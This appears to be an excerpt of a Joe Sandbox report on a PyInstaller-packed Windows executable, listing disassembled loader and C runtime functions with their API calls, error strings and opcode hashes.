                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide
                                                  • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                  • API String ID: 626452242-27947307
                                                  • Opcode ID: 95a316808b8bb9dcda1ce44e410c088c12bf9ca55186ed30222aaf70ba7edd4d
                                                  • Instruction ID: d63f38bad34aceea8a512159cc2c3e6fd77b7bff8bbb1a02cb8027f4f5339ae5
                                                  • Opcode Fuzzy Hash: 95a316808b8bb9dcda1ce44e410c088c12bf9ca55186ed30222aaf70ba7edd4d
                                                  • Instruction Fuzzy Hash: 6C418232609B8292D670EF25B88097AF6A4FB857E4F944135EE8D47BA4EF3CD055C720
                                                  Function 00007FF79EA48AF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(?,00007FF79EA439BA), ref: 00007FF79EA48B31
                                                    • Part of subcall function 00007FF79EA429E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79EA486F3,?,?,?,?,?,?,?,?,?,?,?,00007FF79EA4101D), ref: 00007FF79EA42A14
                                                    • Part of subcall function 00007FF79EA429E0: MessageBoxW.USER32 ref: 00007FF79EA42AEC
                                                  • WideCharToMultiByte.KERNEL32(?,00007FF79EA439BA), ref: 00007FF79EA48BA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLastMessage
                                                  • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                  • API String ID: 3723044601-27947307
                                                  • Opcode ID: b315cce301d6f62c5f2e1af17c77687b806c080175cc497de97e679929b4bd6d
                                                  • Instruction ID: 7697d1fad17428491fb3402ee695ac7a4df5f844fe6a6c8920125dff26e5ac85
                                                  • Opcode Fuzzy Hash: b315cce301d6f62c5f2e1af17c77687b806c080175cc497de97e679929b4bd6d
                                                  • Instruction Fuzzy Hash: E1218071A09B42A9EB60AF36A880879B665FF84BE4F944535DA4D437A5EF3CE5018330
                                                  Function 00007FF79EA474A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 136COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _fread_nolock.LIBCMT ref: 00007FF79EA47616
                                                    • Part of subcall function 00007FF79EA4E6F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79EA4E725
                                                    • Part of subcall function 00007FF79EA4DF3C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79EA4DF50
                                                    • Part of subcall function 00007FF79EA4DF10: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79EA4DF24
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                  • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                  • API String ID: 3231891352-3501660386
                                                  • Opcode ID: edf98be7d230375ec646dfab2f7f9e294e049b0c81e2e89eadb090b533645402
                                                  • Instruction ID: f38109528c1a8c2bd748fa6da70b26b64b8cd029bedecc1d38c0a1a0d887d882
                                                  • Opcode Fuzzy Hash: edf98be7d230375ec646dfab2f7f9e294e049b0c81e2e89eadb090b533645402
                                                  • Instruction Fuzzy Hash: AF515B21A1D68345FA34BB359590AB9E292DF85B94FC40131F90D8A7F6FE2CE9058770
                                                  Function 00007FF79EA47320 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF79EA489E0: MultiByteToWideChar.KERNEL32 ref: 00007FF79EA48A1A
                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF79EA478A1,00000000,?,00000000,00000000,?,00007FF79EA4154F), ref: 00007FF79EA4737F
                                                    • Part of subcall function 00007FF79EA42B30: MessageBoxW.USER32 ref: 00007FF79EA42C01
                                                  Strings
                                                  • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF79EA47356
                                                  • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF79EA47393
                                                  • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF79EA473DA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                  • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                  • API String ID: 1662231829-3498232454
                                                  • Opcode ID: 0497e94e9ccf1a5fcaefba275e41431edb5a0a8d683527cd1b0ae4e2e1f8841f
                                                  • Instruction ID: 1f44e614d258935ef7210279a6bdb01db9752bc60917e1ada39bb941023ecec8
                                                  • Opcode Fuzzy Hash: 0497e94e9ccf1a5fcaefba275e41431edb5a0a8d683527cd1b0ae4e2e1f8841f
                                                  • Instruction Fuzzy Hash: FB317351B19B8291FA70B731A9D5BBAD251EF98780FC44431DE4E427B6FE2CE5048730
                                                  Function 00007FF79EA4D9F4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF79EA4DCA6,?,?,?,00007FF79EA4D9A0,?,?,?,?,00007FF79EA4D6BD), ref: 00007FF79EA4DA79
                                                  • GetLastError.KERNEL32(?,?,?,00007FF79EA4DCA6,?,?,?,00007FF79EA4D9A0,?,?,?,?,00007FF79EA4D6BD), ref: 00007FF79EA4DA87
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF79EA4DCA6,?,?,?,00007FF79EA4D9A0,?,?,?,?,00007FF79EA4D6BD), ref: 00007FF79EA4DAB1
                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF79EA4DCA6,?,?,?,00007FF79EA4D9A0,?,?,?,?,00007FF79EA4D6BD), ref: 00007FF79EA4DAF7
                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF79EA4DCA6,?,?,?,00007FF79EA4D9A0,?,?,?,?,00007FF79EA4D6BD), ref: 00007FF79EA4DB03
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: e5bb3e0ff291abc656a6d02375c50d9a2203cec5dca119044776a3d77a5dec4f
                                                  • Instruction ID: 6e264cb343e5c36b68e966c99309783a9045e6f4456c4584c6f948481d1c0921
                                                  • Opcode Fuzzy Hash: e5bb3e0ff291abc656a6d02375c50d9a2203cec5dca119044776a3d77a5dec4f
                                                  • Instruction Fuzzy Hash: 5431A531B1EA4295EE32BB22A480A75A3D4FF45BA4F994535DD1D07361EF3CE4458330
                                                  Function 00007FF79EA489E0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32 ref: 00007FF79EA48A1A
                                                    • Part of subcall function 00007FF79EA429E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79EA486F3,?,?,?,?,?,?,?,?,?,?,?,00007FF79EA4101D), ref: 00007FF79EA42A14
                                                    • Part of subcall function 00007FF79EA429E0: MessageBoxW.USER32 ref: 00007FF79EA42AEC
                                                  • MultiByteToWideChar.KERNEL32 ref: 00007FF79EA48AA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLastMessage
                                                  • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                  • API String ID: 3723044601-876015163
                                                  • Opcode ID: a676459dfb3979a77974598a44516e19cf720c6d098cc686ef5965a87a87c41d
                                                  • Instruction ID: ded927312df3a17ab9e5e3d293dbdc3069457e8f97b54b822044d2d830383f15
                                                  • Opcode Fuzzy Hash: a676459dfb3979a77974598a44516e19cf720c6d098cc686ef5965a87a87c41d
                                                  • Instruction Fuzzy Hash: 3A214422B08A4291EB60EB35F880579E7A1FF95BD4B984531DA4C53BB9EF2CD5418730
                                                  Function 00007FF79EA6371C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 3a368fc3de0a3251161d515db59c2712d7bca6ac77a04358f46d14fcb5505a4c
                                                  • Instruction ID: 1f3ddd59b0c268aff9622446eaeaf41c5fa1aab673e0ec2cebc75fa330c3d768
                                                  • Opcode Fuzzy Hash: 3a368fc3de0a3251161d515db59c2712d7bca6ac77a04358f46d14fcb5505a4c
                                                  • Instruction Fuzzy Hash: 29118431B18E418AE760AB62E894B35A6A0FBC9FE4F444234DA5D877B5CF7CD4448760
                                                  Function 00007FF79EA42600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                  • String ID: Unhandled exception in script
                                                  • API String ID: 3081866767-2699770090
                                                  • Opcode ID: 9b12c34fca385b1e0ebcb8da6f1b4405c5b5feb8525b654c020fb5a481cc6c3a
                                                  • Instruction ID: 3ebed255250969e0519c601b147b002a431f736ef044844e463731787ba29672
                                                  • Opcode Fuzzy Hash: 9b12c34fca385b1e0ebcb8da6f1b4405c5b5feb8525b654c020fb5a481cc6c3a
                                                  • Instruction Fuzzy Hash: CE312E72A09A8289EB30EB31E8955FDA360FF89784F844135EA4E47B69DF3CD105C760
                                                  Function 00007FF79EA429E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79EA486F3,?,?,?,?,?,?,?,?,?,?,?,00007FF79EA4101D), ref: 00007FF79EA42A14
                                                    • Part of subcall function 00007FF79EA48460: GetLastError.KERNEL32(00000000,00007FF79EA42A60), ref: 00007FF79EA48487
                                                    • Part of subcall function 00007FF79EA48460: FormatMessageW.KERNEL32(00000000,00007FF79EA42A60), ref: 00007FF79EA484B6
                                                    • Part of subcall function 00007FF79EA489E0: MultiByteToWideChar.KERNEL32 ref: 00007FF79EA48A1A
                                                  • MessageBoxW.USER32 ref: 00007FF79EA42AEC
                                                  • MessageBoxA.USER32 ref: 00007FF79EA42B08
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                  • String ID: %s%s: %s$Fatal error detected
                                                  • API String ID: 2806210788-2410924014
                                                  • Opcode ID: abe82f00bef99ceab3cd3b2673c8dde2e3029215b6bdb1f563c87e7f7605427b
                                                  • Instruction ID: 5cad36cb700a26a81886557052978837578c360257d9d347229af5eff1e14bd7
                                                  • Opcode Fuzzy Hash: abe82f00bef99ceab3cd3b2673c8dde2e3029215b6bdb1f563c87e7f7605427b
                                                  • Instruction Fuzzy Hash: 83312571628A8191E630BB21E491BFAA364FB847C4F804036E68D47AA9DF3CD245C770
                                                  Function 00007FF79EA55AE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: a7acc4355d879bac73ca0070a96f8c7632362be6a64aaf3ea2d8cf6c7e704423
                                                  • Instruction ID: db9a1b98cb9269ca7c2f3c645775c3667f86b09553eac7d51de87ab343c3f40b
                                                  • Opcode Fuzzy Hash: a7acc4355d879bac73ca0070a96f8c7632362be6a64aaf3ea2d8cf6c7e704423
                                                  • Instruction Fuzzy Hash: 59F03A61A19A0685EF646B30E8C4B78A360EF88F80F851035D55F46574EE2CD488C330
                                                  Function 00007FF79EA64CE4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: b937517b4f482d0939308dbd49bace3de9952a95ba32e0c18fc8e236c2565ddb
                                                  • Instruction ID: 0c7ca6fdf0e40c3ba0af4b5f016366a5f8e976d488d73d2b7d1729dfc351f018
                                                  • Opcode Fuzzy Hash: b937517b4f482d0939308dbd49bace3de9952a95ba32e0c18fc8e236c2565ddb
                                                  • Instruction Fuzzy Hash: 14111222E58E1385F7783334E8D9B799145FF97B68F944634EABE0A6F68E1CA8414130
                                                  Function 00007FF79EA5BAA8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                  • API String ID: 3215553584-1196891531
                                                  • Opcode ID: ccb95f15847098836496565d61634b0a9897f76ac7b45429749bb7ab022bb6ee
                                                  • Instruction ID: 482ef05dca9de1b114a0d627aa125bcb30ea047e14bcbe665370b12fd73947bb
                                                  • Opcode Fuzzy Hash: ccb95f15847098836496565d61634b0a9897f76ac7b45429749bb7ab022bb6ee
                                                  • Instruction Fuzzy Hash: 2381B072E0860285F7746F3981D0EBDBAA0EF15B86FD58035DA09572B4CF2DE9019B35
                                                  Function 00007FF79EA42890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Message$ByteCharMultiWide
                                                  • String ID: %s%s: %s$Fatal error detected
                                                  • API String ID: 1878133881-2410924014
                                                  • Opcode ID: 7762545bfdab7d4dcf66979fd066f08ead0e9605e06221d549922be69e8cbe44
                                                  • Instruction ID: 7267e8348452a56d0109d5779c42ef618e257fdb78e11b65e39ad28d86054494
                                                  • Opcode Fuzzy Hash: 7762545bfdab7d4dcf66979fd066f08ead0e9605e06221d549922be69e8cbe44
                                                  • Instruction Fuzzy Hash: 82311471628A8191E630BB21E491BFAA764FB947C4FC04435EA8D47AA9DF3CD205CB74
                                                  Function 00007FF79EA43E90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,00007FF79EA439BA), ref: 00007FF79EA43EC1
                                                    • Part of subcall function 00007FF79EA429E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79EA486F3,?,?,?,?,?,?,?,?,?,?,?,00007FF79EA4101D), ref: 00007FF79EA42A14
                                                    • Part of subcall function 00007FF79EA429E0: MessageBoxW.USER32 ref: 00007FF79EA42AEC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastMessageModuleName
                                                  • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                  • API String ID: 2581892565-1977442011
                                                  • Opcode ID: fbc692f4baafbe859fca0023d07415701a2e0dd3eaf1b7cf8d95a3283e939708
                                                  • Instruction ID: 58651aa3a883e562c273f4fa5a437abf17ba7cf765e9036e3fedf011f3910368
                                                  • Opcode Fuzzy Hash: fbc692f4baafbe859fca0023d07415701a2e0dd3eaf1b7cf8d95a3283e939708
                                                  • Instruction Fuzzy Hash: 57018461B19A4295FA70B735E896BB992E1EF4C780FC00031E94D862B7FE5CE1098730
                                                  Function 00007FF79EA621C4 Relevance: 6.2, APIs: 4, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo$_get_daylight
                                                  • String ID:
                                                  • API String ID: 72036449-0
                                                  • Opcode ID: 36b426960828c7d9f54d9ae6d583415da6549470ad10fa493736d6e8dab543fb
                                                  • Instruction ID: 4b5c31e8eef13d8d5fa3a4ace19fc23a826e50f80e5a496056f6249f490c07ec
                                                  • Opcode Fuzzy Hash: 36b426960828c7d9f54d9ae6d583415da6549470ad10fa493736d6e8dab543fb
                                                  • Instruction Fuzzy Hash: 1751D132D0CA0246F7787B38A484BBDE680EB5BF14F994134CA49466F6CF3CE8408671
                                                  Function 00007FF79EA5173C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
